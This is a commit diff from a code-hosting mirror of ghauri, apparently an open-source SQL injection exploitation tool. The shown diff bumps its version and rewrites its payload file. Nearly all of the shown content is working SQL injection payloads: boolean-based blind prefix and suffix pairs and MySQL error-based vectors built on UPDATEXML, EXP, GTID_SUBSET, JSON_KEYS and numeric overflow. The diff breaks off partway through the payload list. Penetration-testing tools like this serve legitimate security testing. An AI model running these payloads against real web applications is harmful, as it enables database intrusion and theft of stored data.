crash.software
Projects
Pull Requests
Issues
Builds
ghauri
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY ghauri Commits 6c587217
🤬

  • updated code quality, fixed issue with character validation in case of boolean based injection, updated case detection of page ratio in boolean based, bumped version 1.0.7

  • Loading...
  • r0oth3x49 committed 2 years ago
    6c587217
    1 parent d73ef80d
  • ■ ■ ■ ■
    ghauri/__init__.py
    skipped 23 lines
    24 24   
    25 25  """
    26 26   
    27  -__version__ = "1.0.6"
     27 +__version__ = "1.0.7"
    28 28  __author__ = "Nasir Khan (r0ot h3x49)"
    29 29  __license__ = "MIT"
    30 30  __copyright__ = "Copyright (c) 2016-2025 Nasir Khan (r0ot h3x49)"
    skipped 2 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/common/config.py
    skipped 39 lines
    40 40   filepaths=None,
    41 41   proxy=None,
    42 42   text_only=False,
     43 + string=None,
     44 + not_string=None,
     45 + code=None,
     46 + match_ratio=None,
     47 + retry=3,
     48 + base=None,
     49 + attack01=None,
     50 + delay=0,
     51 + timesec=5,
     52 + timeout=30,
     53 + backend=None,
     54 + batch=False,
    43 55   ):
    44 56   self.vectors = vectors
    45 57   self.is_string = is_string
    skipped 4 lines
    50 62   self._session_filepath = None
    51 63   self.proxy = proxy
    52 64   self.text_only = text_only
     65 + self.string = string
     66 + self.not_string = not_string
     67 + self.code = code
     68 + self.match_ratio = match_ratio
     69 + self.retry = retry
     70 + self.base = base
     71 + self.attack01 = attack01
     72 + self.backend = backend
     73 + self.batch = batch
     74 + self.http_codes = {}
    53 75   
    54 76   @property
    55 77   def session_filepath(self):
    skipped 7 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/common/payloads.py
    skipped 223 lines
    224 224   "comments": [
    225 225   {"pref": " ", "suf": ""},
    226 226   {"pref": " ", "suf": "-- wXyW"},
     227 + {"pref": ") ", "suf": " AND (04586=4586"},
    227 228   {"pref": "' ", "suf": "-- wXyW"},
    228 229   {"pref": '" ', "suf": "-- wXyW"},
    229  - # {"pref": ") ", "suf": "-- wXyW"},
     230 + {"pref": ") ", "suf": "-- wXyW"},
    230 231   {"pref": "') ", "suf": "-- wXyW"},
    231  - # {"pref": '") ', "suf": "-- wXyW"},
    232  - {"pref": " ", "suf": " OR 3*2*1=6-- wXyW"},
    233  - {"pref": "' ", "suf": " OR '1'='1-- wXyW"},
    234  - {"pref": '" ', "suf": ' OR "1"="1-- wXyW'},
    235  - {"pref": "' ", "suf": " AND '1'='1-- wXyW"},
    236  - {"pref": '" ', "suf": ' AND "1"="1-- wXyW'},
    237  - # {"pref": ") ", "suf": " OR (1=1-- wXyW"},
    238  - # {"pref": ") ", "suf": " AND (1=1-- wXyW"},
    239  - # {"pref": "') ", "suf": " OR ('1'='1-- wXyW"},
    240  - # {"pref": '") ', "suf": ' OR ("1"="1-- wXyW'},
    241  - # {"pref": "') ", "suf": " AND ('1'='1-- wXyW"},
    242  - # {"pref": '") ', "suf": ' AND ("1"="1-- wXyW'},
     232 + {"pref": '") ', "suf": "-- wXyW"},
     233 + {"pref": ") ", "suf": " OR (04586=4586"},
     234 + {"pref": "') ", "suf": " AND ('04586'='4586"},
     235 + {"pref": '") ', "suf": ' AND ("04586"="4586'},
     236 + {"pref": "' ", "suf": " AND '04586'='4586"},
     237 + {"pref": '" ', "suf": ' AND "04586"="4586'},
     238 + {"pref": "') ", "suf": " OR ('04586'='4586"},
     239 + {"pref": '") ', "suf": ' OR ("04586"="4586'},
     240 + {"pref": "' ", "suf": " OR '04586'='4586--"},
     241 + {"pref": '" ', "suf": ' OR "04586"="4586--'},
    243 242   ],
    244 243   "title": "AND boolean-based blind - WHERE or HAVING clause",
    245 244   "vector": "AND [INFERENCE]",
    skipped 9 lines
    255 254   {"pref": ") ", "suf": "-- wXyW"},
    256 255   {"pref": "') ", "suf": "-- wXyW"},
    257 256   {"pref": '") ', "suf": "-- wXyW"},
    258  - # {"pref": " ", "suf": " AND 3*2*1=6-- wXyW"},
    259  - # {"pref": "' ", "suf": " OR '1'='1-- wXyW"},
    260  - # {"pref": '" ', "suf": ' OR "1"="1-- wXyW'},
    261  - # {"pref": "' ", "suf": " AND '1'='1-- wXyW"},
    262  - # {"pref": '" ', "suf": ' AND "1"="1-- wXyW'},
    263  - # {"pref": ") ", "suf": " OR (1=1-- wXyW"},
    264  - # {"pref": ") ", "suf": " AND (1=1-- wXyW"},
    265  - # {"pref": "') ", "suf": " OR ('1'='1-- wXyW"},
    266  - # {"pref": '") ', "suf": ' OR ("1"="1-- wXyW'},
    267  - # {"pref": "') ", "suf": " AND ('1'='1-- wXyW"},
    268  - # {"pref": '") ', "suf": ' AND ("1"="1-- wXyW'},
     257 + {"pref": ") ", "suf": " AND (04586=4586"},
     258 + # {"pref": ") ", "suf": " OR (04586=4586"},
     259 + {"pref": "') ", "suf": " AND ('04586'='4586"},
     260 + {"pref": '") ', "suf": ' AND ("04586"="4586'},
     261 + {"pref": "' ", "suf": " AND '04586'='4586"},
     262 + {"pref": '" ', "suf": ' AND "04586"="4586'},
     263 + # {"pref": "') ", "suf": " OR ('04586'='4586"},
     264 + # {"pref": '") ', "suf": ' OR ("04586"="4586'},
     265 + # {"pref": "' ", "suf": " OR '04586'='4586--"},
     266 + # {"pref": '" ', "suf": ' OR "04586"="4586--'},
    269 267   ],
    270 268   "title": "OR boolean-based blind - WHERE or HAVING clause (NOT)",
    271 269   "vector": "OR NOT [INFERENCE]",
    skipped 6 lines
    278 276   {"pref": " ", "suf": "-- wXyW"},
    279 277   {"pref": "' ", "suf": "-- wXyW"},
    280 278   {"pref": '" ', "suf": "-- wXyW"},
    281  - # {"pref": ") ", "suf": "-- wXyW"},
     279 + {"pref": ") ", "suf": "-- wXyW"},
    282 280   {"pref": "') ", "suf": "-- wXyW"},
    283  - # {"pref": '") ', "suf": "-- wXyW"},
    284  - {"pref": " ", "suf": " AND 3*2*1=6-- wXyW"},
    285  - {"pref": "' ", "suf": " OR '1'='1-- wXyW"},
    286  - {"pref": '" ', "suf": ' OR "1"="1-- wXyW'},
    287  - {"pref": "' ", "suf": " AND '1'='1-- wXyW"},
    288  - {"pref": '" ', "suf": ' AND "1"="1-- wXyW'},
    289  - # {"pref": ") ", "suf": " OR (1=1-- wXyW"},
    290  - # {"pref": ") ", "suf": " AND (1=1-- wXyW"},
    291  - # {"pref": "') ", "suf": " OR ('1'='1-- wXyW"},
    292  - # {"pref": '") ', "suf": ' OR ("1"="1-- wXyW'},
    293  - # {"pref": "') ", "suf": " AND ('1'='1-- wXyW"},
    294  - # {"pref": '") ', "suf": ' AND ("1"="1-- wXyW'},
     281 + {"pref": '") ', "suf": "-- wXyW"},
     282 + {"pref": ") ", "suf": " AND (04586=4586"},
     283 + {"pref": ") ", "suf": " OR (04586=4586"},
     284 + {"pref": "') ", "suf": " AND ('04586'='4586"},
     285 + {"pref": '") ', "suf": ' AND ("04586"="4586'},
     286 + {"pref": "' ", "suf": " AND '04586'='4586"},
     287 + {"pref": '" ', "suf": ' AND "04586"="4586'},
     288 + {"pref": "') ", "suf": " OR ('04586'='4586"},
     289 + {"pref": '") ', "suf": ' OR ("04586"="4586'},
     290 + {"pref": "' ", "suf": " OR '04586'='4586--"},
     291 + {"pref": '" ', "suf": ' OR "04586"="4586--'},
    295 292   ],
    296 293   "title": "OR boolean-based blind - WHERE or HAVING clause",
    297 294   "vector": "OR [INFERENCE]",
    skipped 187 lines
    485 482   },
    486 483   ],
    487 484   "error-based": [
     485 + # {
     486 + # "payload": "AND (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)",
     487 + # "comments": [
     488 + # # {"pref": " ", "suf": ""},
     489 + # {"pref": " ", "suf": "-- wXyW"},
     490 + # {"pref": " ", "suf": "#"},
     491 + # # {"pref": "' ", "suf": ""},
     492 + # {"pref": "' ", "suf": "-- wXyW"},
     493 + # {"pref": "' ", "suf": "#"},
     494 + # # {"pref": '" ', "suf": ""},
     495 + # {"pref": '" ', "suf": "-- wXyW"},
     496 + # {"pref": '" ', "suf": "#"},
     497 + # # {"pref": ") ", "suf": ""},
     498 + # {"pref": ") ", "suf": "-- wXyW"},
     499 + # {"pref": ") ", "suf": "#"},
     500 + # # {"pref": "') ", "suf": ""},
     501 + # {"pref": "') ", "suf": "-- wXyW"},
     502 + # {"pref": "') ", "suf": "#"},
     503 + # # {"pref": '") ', "suf": ""},
     504 + # {"pref": '") ', "suf": "-- wXyW"},
     505 + # {"pref": '") ', "suf": "#"},
     506 + # ],
     507 + # "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)",
     508 + # "vector": "AND (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)",
     509 + # "dbms": "MySQL",
     510 + # },
     511 + # {
     512 + # "payload": "OR (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)",
     513 + # "comments": [
     514 + # # {"pref": " ", "suf": ""},
     515 + # {"pref": " ", "suf": "-- wXyW"},
     516 + # {"pref": " ", "suf": "#"},
     517 + # # {"pref": "' ", "suf": ""},
     518 + # {"pref": "' ", "suf": "-- wXyW"},
     519 + # {"pref": "' ", "suf": "#"},
     520 + # # {"pref": '" ', "suf": ""},
     521 + # {"pref": '" ', "suf": "-- wXyW"},
     522 + # {"pref": '" ', "suf": "#"},
     523 + # # {"pref": ") ", "suf": ""},
     524 + # {"pref": ") ", "suf": "-- wXyW"},
     525 + # {"pref": ") ", "suf": "#"},
     526 + # # {"pref": "') ", "suf": ""},
     527 + # {"pref": "') ", "suf": "-- wXyW"},
     528 + # {"pref": "') ", "suf": "#"},
     529 + # # {"pref": '") ', "suf": ""},
     530 + # {"pref": '") ', "suf": "-- wXyW"},
     531 + # {"pref": '") ', "suf": "#"},
     532 + # ],
     533 + # "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)",
     534 + # "vector": "OR (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)",
     535 + # "dbms": "MySQL",
     536 + # },
     537 + # {
     538 + # "payload": "AND EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)e)x))",
     539 + # "comments": [
     540 + # # {"pref": " ", "suf": ""},
     541 + # {"pref": " ", "suf": "-- wXyW"},
     542 + # {"pref": " ", "suf": "#"},
     543 + # # {"pref": "' ", "suf": ""},
     544 + # {"pref": "' ", "suf": "-- wXyW"},
     545 + # {"pref": "' ", "suf": "#"},
     546 + # # {"pref": '" ', "suf": ""},
     547 + # {"pref": '" ', "suf": "-- wXyW"},
     548 + # {"pref": '" ', "suf": "#"},
     549 + # # {"pref": ") ", "suf": ""},
     550 + # {"pref": ") ", "suf": "-- wXyW"},
     551 + # {"pref": ") ", "suf": "#"},
     552 + # # {"pref": "') ", "suf": ""},
     553 + # {"pref": "') ", "suf": "-- wXyW"},
     554 + # {"pref": "') ", "suf": "#"},
     555 + # # {"pref": '") ', "suf": ""},
     556 + # {"pref": '") ', "suf": "-- wXyW"},
     557 + # {"pref": '") ', "suf": "#"},
     558 + # ],
     559 + # "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)",
     560 + # "vector": "AND EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)e)x))",
     561 + # "dbms": "MySQL",
     562 + # },
     563 + # {
     564 + # "payload": "OR EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)e)x))",
     565 + # "comments": [
     566 + # # {"pref": " ", "suf": ""},
     567 + # {"pref": " ", "suf": "-- wXyW"},
     568 + # {"pref": " ", "suf": "#"},
     569 + # # {"pref": "' ", "suf": ""},
     570 + # {"pref": "' ", "suf": "-- wXyW"},
     571 + # {"pref": "' ", "suf": "#"},
     572 + # # {"pref": '" ', "suf": ""},
     573 + # {"pref": '" ', "suf": "-- wXyW"},
     574 + # {"pref": '" ', "suf": "#"},
     575 + # # {"pref": ") ", "suf": ""},
     576 + # {"pref": ") ", "suf": "-- wXyW"},
     577 + # {"pref": ") ", "suf": "#"},
     578 + # # {"pref": "') ", "suf": ""},
     579 + # {"pref": "') ", "suf": "-- wXyW"},
     580 + # {"pref": "') ", "suf": "#"},
     581 + # # {"pref": '") ', "suf": ""},
     582 + # {"pref": '") ', "suf": "-- wXyW"},
     583 + # {"pref": '") ', "suf": "#"},
     584 + # ],
     585 + # "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)",
     586 + # "vector": "OR EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)e)x))",
     587 + # "dbms": "MySQL",
     588 + # },
     589 + # {
     590 + # "payload": "AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)",
     591 + # "comments": [
     592 + # # {"pref": " ", "suf": ""},
     593 + # {"pref": " ", "suf": "-- wXyW"},
     594 + # {"pref": " ", "suf": "#"},
     595 + # # {"pref": "' ", "suf": ""},
     596 + # {"pref": "' ", "suf": "-- wXyW"},
     597 + # {"pref": "' ", "suf": "#"},
     598 + # # {"pref": '" ', "suf": ""},
     599 + # {"pref": '" ', "suf": "-- wXyW"},
     600 + # {"pref": '" ', "suf": "#"},
     601 + # # {"pref": ") ", "suf": ""},
     602 + # {"pref": ") ", "suf": "-- wXyW"},
     603 + # {"pref": ") ", "suf": "#"},
     604 + # # {"pref": "') ", "suf": ""},
     605 + # {"pref": "') ", "suf": "-- wXyW"},
     606 + # {"pref": "') ", "suf": "#"},
     607 + # # {"pref": '") ', "suf": ""},
     608 + # {"pref": '") ', "suf": "-- wXyW"},
     609 + # {"pref": '") ', "suf": "#"},
     610 + # ],
     611 + # "title": "MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)",
     612 + # "vector": "AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44),1337)",
     613 + # "dbms": "MySQL",
     614 + # },
     615 + # {
     616 + # "payload": "OR GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)",
     617 + # "comments": [
     618 + # # {"pref": " ", "suf": ""},
     619 + # {"pref": " ", "suf": "-- wXyW"},
     620 + # {"pref": " ", "suf": "#"},
     621 + # # {"pref": "' ", "suf": ""},
     622 + # {"pref": "' ", "suf": "-- wXyW"},
     623 + # {"pref": "' ", "suf": "#"},
     624 + # # {"pref": '" ', "suf": ""},
     625 + # {"pref": '" ', "suf": "-- wXyW"},
     626 + # {"pref": '" ', "suf": "#"},
     627 + # # {"pref": ") ", "suf": ""},
     628 + # {"pref": ") ", "suf": "-- wXyW"},
     629 + # {"pref": ") ", "suf": "#"},
     630 + # # {"pref": "') ", "suf": ""},
     631 + # {"pref": "') ", "suf": "-- wXyW"},
     632 + # {"pref": "') ", "suf": "#"},
     633 + # # {"pref": '") ', "suf": ""},
     634 + # {"pref": '") ', "suf": "-- wXyW"},
     635 + # {"pref": '") ', "suf": "#"},
     636 + # ],
     637 + # "title": "MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)",
     638 + # "vector": "OR GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44),1337)",
     639 + # "dbms": "MySQL",
     640 + # },
     641 + # {
     642 + # "payload": "AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)) USING utf8)))",
     643 + # "comments": [
     644 + # # {"pref": " ", "suf": ""},
     645 + # {"pref": " ", "suf": "-- wXyW"},
     646 + # {"pref": " ", "suf": "#"},
     647 + # # {"pref": "' ", "suf": ""},
     648 + # {"pref": "' ", "suf": "-- wXyW"},
     649 + # {"pref": "' ", "suf": "#"},
     650 + # # {"pref": '" ', "suf": ""},
     651 + # {"pref": '" ', "suf": "-- wXyW"},
     652 + # {"pref": '" ', "suf": "#"},
     653 + # # {"pref": ") ", "suf": ""},
     654 + # {"pref": ") ", "suf": "-- wXyW"},
     655 + # {"pref": ") ", "suf": "#"},
     656 + # # {"pref": "') ", "suf": ""},
     657 + # {"pref": "') ", "suf": "-- wXyW"},
     658 + # {"pref": "') ", "suf": "#"},
     659 + # # {"pref": '") ', "suf": ""},
     660 + # {"pref": '") ', "suf": "-- wXyW"},
     661 + # {"pref": '") ', "suf": "#"},
     662 + # ],
     663 + # "title": "MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)",
     664 + # "vector": "AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)) USING utf8)))",
     665 + # "dbms": "MySQL",
     666 + # },
     667 + # {
     668 + # "payload": "OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)) USING utf8)))",
     669 + # "comments": [
     670 + # # {"pref": " ", "suf": ""},
     671 + # {"pref": " ", "suf": "-- wXyW"},
     672 + # {"pref": " ", "suf": "#"},
     673 + # # {"pref": "' ", "suf": ""},
     674 + # {"pref": "' ", "suf": "-- wXyW"},
     675 + # {"pref": "' ", "suf": "#"},
     676 + # # {"pref": '" ', "suf": ""},
     677 + # {"pref": '" ', "suf": "-- wXyW"},
     678 + # {"pref": '" ', "suf": "#"},
     679 + # # {"pref": ") ", "suf": ""},
     680 + # {"pref": ") ", "suf": "-- wXyW"},
     681 + # {"pref": ") ", "suf": "#"},
     682 + # # {"pref": "') ", "suf": ""},
     683 + # {"pref": "') ", "suf": "-- wXyW"},
     684 + # {"pref": "') ", "suf": "#"},
     685 + # # {"pref": '") ', "suf": ""},
     686 + # {"pref": '") ', "suf": "-- wXyW"},
     687 + # {"pref": '") ', "suf": "#"},
     688 + # ],
     689 + # "title": "MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)",
     690 + # "vector": "OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)) USING utf8)))",
     691 + # "dbms": "MySQL",
     692 + # },
     693 + # {
     694 + # "payload": "AND (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)",
     695 + # "comments": [
     696 + # # {"pref": " ", "suf": ""},
     697 + # {"pref": " ", "suf": "-- wXyW"},
     698 + # {"pref": " ", "suf": "#"},
     699 + # # {"pref": "' ", "suf": ""},
     700 + # {"pref": "' ", "suf": "-- wXyW"},
     701 + # {"pref": "' ", "suf": "#"},
     702 + # # {"pref": '" ', "suf": ""},
     703 + # {"pref": '" ', "suf": "-- wXyW"},
     704 + # {"pref": '" ', "suf": "#"},
     705 + # # {"pref": ") ", "suf": ""},
     706 + # {"pref": ") ", "suf": "-- wXyW"},
     707 + # {"pref": ") ", "suf": "#"},
     708 + # # {"pref": "') ", "suf": ""},
     709 + # {"pref": "') ", "suf": "-- wXyW"},
     710 + # {"pref": "') ", "suf": "#"},
     711 + # # {"pref": '") ', "suf": ""},
     712 + # {"pref": '") ', "suf": "-- wXyW"},
     713 + # {"pref": '") ', "suf": "#"},
     714 + # ],
     715 + # "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (DOUBLE)",
     716 + # "vector": "AND (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)",
     717 + # "dbms": "MySQL",
     718 + # },
     719 + # {
     720 + # "payload": "OR (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)",
     721 + # "comments": [
     722 + # # {"pref": " ", "suf": ""},
     723 + # {"pref": " ", "suf": "-- wXyW"},
     724 + # {"pref": " ", "suf": "#"},
     725 + # # {"pref": "' ", "suf": ""},
     726 + # {"pref": "' ", "suf": "-- wXyW"},
     727 + # {"pref": "' ", "suf": "#"},
     728 + # # {"pref": '" ', "suf": ""},
     729 + # {"pref": '" ', "suf": "-- wXyW"},
     730 + # {"pref": '" ', "suf": "#"},
     731 + # # {"pref": ") ", "suf": ""},
     732 + # {"pref": ") ", "suf": "-- wXyW"},
     733 + # {"pref": ") ", "suf": "#"},
     734 + # # {"pref": "') ", "suf": ""},
     735 + # {"pref": "') ", "suf": "-- wXyW"},
     736 + # {"pref": "') ", "suf": "#"},
     737 + # # {"pref": '") ', "suf": ""},
     738 + # {"pref": '") ', "suf": "-- wXyW"},
     739 + # {"pref": '") ', "suf": "#"},
     740 + # ],
     741 + # "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (DOUBLE)",
     742 + # "vector": "OR (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)",
     743 + # "dbms": "MySQL",
     744 + # },
    488 745   {
    489  - "payload": "AND (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)",
     746 + "payload": "AND UPDATEXML(0,CONCAT_WS(0x28,0x7e,0x72306f746833783439,0x7e),0)",
    490 747   "comments": [
    491 748   # {"pref": " ", "suf": ""},
    492 749   {"pref": " ", "suf": "-- wXyW"},
     750 + {"pref": " ", "suf": "#"},
    493 751   # {"pref": "' ", "suf": ""},
    494 752   {"pref": "' ", "suf": "-- wXyW"},
     753 + {"pref": "' ", "suf": "#"},
    495 754   # {"pref": '" ', "suf": ""},
    496 755   {"pref": '" ', "suf": "-- wXyW"},
     756 + {"pref": '" ', "suf": "#"},
    497 757   # {"pref": ") ", "suf": ""},
    498 758   {"pref": ") ", "suf": "-- wXyW"},
     759 + {"pref": ") ", "suf": "#"},
    499 760   # {"pref": "') ", "suf": ""},
    500 761   {"pref": "') ", "suf": "-- wXyW"},
     762 + {"pref": "') ", "suf": "#"},
    501 763   # {"pref": '") ', "suf": ""},
    502 764   {"pref": '") ', "suf": "-- wXyW"},
     765 + {"pref": '") ', "suf": "#"},
    503 766   ],
    504  - "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)",
    505  - "vector": "AND (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)",
     767 + "title": "MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)",
     768 + "vector": "AND UPDATEXML(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e),0)",
    506 769   "dbms": "MySQL",
    507 770   },
    508 771   {
    509  - "payload": "OR (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)",
     772 + "payload": "AND UPDATEXML(0,CONCAT_WS('r0oth3x49'),0)",
    510 773   "comments": [
    511 774   # {"pref": " ", "suf": ""},
    512 775   {"pref": " ", "suf": "-- wXyW"},
     776 + {"pref": " ", "suf": "#"},
    513 777   # {"pref": "' ", "suf": ""},
    514 778   {"pref": "' ", "suf": "-- wXyW"},
     779 + {"pref": "' ", "suf": "#"},
    515 780   # {"pref": '" ', "suf": ""},
    516 781   {"pref": '" ', "suf": "-- wXyW"},
     782 + {"pref": '" ', "suf": "#"},
    517 783   # {"pref": ") ", "suf": ""},
    518 784   {"pref": ") ", "suf": "-- wXyW"},
     785 + {"pref": ") ", "suf": "#"},
    519 786   # {"pref": "') ", "suf": ""},
    520 787   {"pref": "') ", "suf": "-- wXyW"},
     788 + {"pref": "') ", "suf": "#"},
    521 789   # {"pref": '") ', "suf": ""},
    522 790   {"pref": '") ', "suf": "-- wXyW"},
     791 + {"pref": '") ', "suf": "#"},
    523 792   ],
    524  - "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)",
    525  - "vector": "OR (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)",
    526  - "dbms": "MySQL",
    527  - },
    528  - {
    529  - "payload": "AND EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)e)x))",
    530  - "comments": [
    531  - # {"pref": " ", "suf": ""},
    532  - {"pref": " ", "suf": "-- wXyW"},
    533  - # {"pref": "' ", "suf": ""},
    534  - {"pref": "' ", "suf": "-- wXyW"},
    535  - # {"pref": '" ', "suf": ""},
    536  - {"pref": '" ', "suf": "-- wXyW"},
    537  - # {"pref": ") ", "suf": ""},
    538  - {"pref": ") ", "suf": "-- wXyW"},
    539  - # {"pref": "') ", "suf": ""},
    540  - {"pref": "') ", "suf": "-- wXyW"},
    541  - # {"pref": '") ', "suf": ""},
    542  - {"pref": '") ', "suf": "-- wXyW"},
    543  - ],
    544  - "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)",
    545  - "vector": "AND EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)e)x))",
    546  - "dbms": "MySQL",
    547  - },
    548  - {
    549  - "payload": "OR EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)e)x))",
    550  - "comments": [
    551  - # {"pref": " ", "suf": ""},
    552  - {"pref": " ", "suf": "-- wXyW"},
    553  - # {"pref": "' ", "suf": ""},
    554  - {"pref": "' ", "suf": "-- wXyW"},
    555  - # {"pref": '" ', "suf": ""},
    556  - {"pref": '" ', "suf": "-- wXyW"},
    557  - # {"pref": ") ", "suf": ""},
    558  - {"pref": ") ", "suf": "-- wXyW"},
    559  - # {"pref": "') ", "suf": ""},
    560  - {"pref": "') ", "suf": "-- wXyW"},
    561  - # {"pref": '") ', "suf": ""},
    562  - {"pref": '") ', "suf": "-- wXyW"},
    563  - ],
    564  - "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)",
    565  - "vector": "OR EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)e)x))",
    566  - "dbms": "MySQL",
    567  - },
    568  - {
    569  - "payload": "AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)",
    570  - "comments": [
    571  - # {"pref": " ", "suf": ""},
    572  - {"pref": " ", "suf": "-- wXyW"},
    573  - # {"pref": "' ", "suf": ""},
    574  - {"pref": "' ", "suf": "-- wXyW"},
    575  - # {"pref": '" ', "suf": ""},
    576  - {"pref": '" ', "suf": "-- wXyW"},
    577  - # {"pref": ") ", "suf": ""},
    578  - {"pref": ") ", "suf": "-- wXyW"},
    579  - # {"pref": "') ", "suf": ""},
    580  - {"pref": "') ", "suf": "-- wXyW"},
    581  - # {"pref": '") ', "suf": ""},
    582  - {"pref": '") ', "suf": "-- wXyW"},
    583  - ],
    584  - "title": "MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)",
    585  - "vector": "AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44),1337)",
    586  - "dbms": "MySQL",
    587  - },
    588  - {
    589  - "payload": "OR GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)",
    590  - "comments": [
    591  - # {"pref": " ", "suf": ""},
    592  - {"pref": " ", "suf": "-- wXyW"},
    593  - # {"pref": "' ", "suf": ""},
    594  - {"pref": "' ", "suf": "-- wXyW"},
    595  - # {"pref": '" ', "suf": ""},
    596  - {"pref": '" ', "suf": "-- wXyW"},
    597  - # {"pref": ") ", "suf": ""},
    598  - {"pref": ") ", "suf": "-- wXyW"},
    599  - # {"pref": "') ", "suf": ""},
    600  - {"pref": "') ", "suf": "-- wXyW"},
    601  - # {"pref": '") ', "suf": ""},
    602  - {"pref": '") ', "suf": "-- wXyW"},
    603  - ],
    604  - "title": "MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)",
    605  - "vector": "OR GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44),1337)",
    606  - "dbms": "MySQL",
    607  - },
    608  - {
    609  - "payload": "AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)) USING utf8)))",
    610  - "comments": [
    611  - # {"pref": " ", "suf": ""},
    612  - {"pref": " ", "suf": "-- wXyW"},
    613  - # {"pref": "' ", "suf": ""},
    614  - {"pref": "' ", "suf": "-- wXyW"},
    615  - # {"pref": '" ', "suf": ""},
    616  - {"pref": '" ', "suf": "-- wXyW"},
    617  - # {"pref": ") ", "suf": ""},
    618  - {"pref": ") ", "suf": "-- wXyW"},
    619  - # {"pref": "') ", "suf": ""},
